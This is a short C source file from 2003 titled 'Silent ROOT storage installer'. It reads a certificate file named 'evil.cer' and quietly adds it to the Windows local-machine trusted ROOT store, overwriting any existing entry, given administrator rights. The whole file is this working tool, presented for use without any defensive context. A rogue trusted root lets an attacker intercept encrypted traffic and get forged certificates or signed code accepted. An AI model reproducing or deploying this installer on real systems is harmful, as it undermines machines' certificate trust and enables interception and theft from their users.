/*
Silent ROOT storage installer
platform: Microsoft Windows
require: Administrative privilage on target OS
usage: srsi evil.cer
author: Roman S Emelyanov
email: ers@ers.msk.ru
date: 03.07.2003
compile with VC6: cl srsi.c crypt32.lib
source: http://ers.msk.ru/soft/srsi.c
binary: http://ers.msk.ru/soft/srsi.exe
*/


#define _WIN32_WINNT	0x0500	

#define ENCODING (X509_ASN_ENCODING | PKCS_7_ASN_ENCODING)

#include "windows.h"

void main(void) { 

DWORD dwSubjectFlags = CERT_SYSTEM_STORE_LOCAL_MACHINE;
//DWORD dwSubjectFlags = CERT_SYSTEM_STORE_CURRENT_USER;
DWORD dwSize, dwRead;
HCERTSTORE hStore = NULL;
WCHAR szwStore[20];
BOOL bResult;
LPBYTE pbEncodedCert = NULL;
PCCERT_CONTEXT pCertContext = NULL;
LPSTR szSubjectStore = "ROOT";
LPSTR szCertFile = "evil.cer";
HANDLE hFile = INVALID_HANDLE_VALUE;
HANDLE hHeap = 0;
int i;
	
	 /* Get process heap*/
     hHeap = GetProcessHeap();

     /* Open Certificate file*/
     hFile = CreateFile(szCertFile,
                   GENERIC_READ,
                   0,
                   NULL,
                   OPEN_EXISTING,
                   FILE_ATTRIBUTE_NORMAL,
                   NULL);
     if (hFile == INVALID_HANDLE_VALUE)
     {
       printf("Unable to open certificate file: %s\n",szCertFile);
       exit(-1);
     }

     /* Get file length*/
     dwSize = GetFileSize(hFile, NULL);
     if (dwSize == 0xFFFFFFFF)
     {
       printf("Unable to get size of certificate file\n");
       exit(-1);
     }

     /* Allocate memory for encoded certificate*/
     pbEncodedCert = (LPBYTE)HeapAlloc(hHeap, 0, dwSize);
     if (!pbEncodedCert)
     {
       printf("Unable to allocate memory for encoded certificate\n");
       exit(-1);
     }

     /* Read encoded certificate data*/
     bResult = ReadFile(hFile,
                    (LPVOID)pbEncodedCert,
                    dwSize,
                    &dwRead,
                    NULL);
     if (!bResult)
     {
       printf("Unable to read encoded certificate\n");
       exit(-1);
     }

     /* Close file handle*/
     CloseHandle(hFile);
     hFile = INVALID_HANDLE_VALUE;

	/* Convert Store string to unicode*/
          i = MultiByteToWideChar(0, 0, szSubjectStore, -1, szwStore, 20);
          if (i == 0)
          {
              printf("MultiByteToWideChar failed with %d\n", GetLastError());
              exit(-1);
          }

	/* Open Certificate store*/
          hStore = CertOpenStore(CERT_STORE_PROV_SYSTEM,
                                 ENCODING,
                                 0, dwSubjectFlags, (LPVOID)szwStore);
          if (!hStore)
          {
              printf("CertOpenStore failed with %x\n", GetLastError());
              exit(-1);
          }
	/* Place Certificate in store*/
          bResult = CertAddEncodedCertificateToStore(hStore, X509_ASN_ENCODING,
                                    pbEncodedCert, dwSize,
                                    CERT_STORE_ADD_REPLACE_EXISTING,
                                    &pCertContext);
          if (!bResult)
          {
              printf("CertAddEncodedCertificateToStore failed with %x\n", GetLastError());
              exit(-1);
          }
	/* Close Certificate store*/
		if (hStore) CertCloseStore(hStore, 0);

		printf("Certificate successfuly installed to ROOT storage\n");

}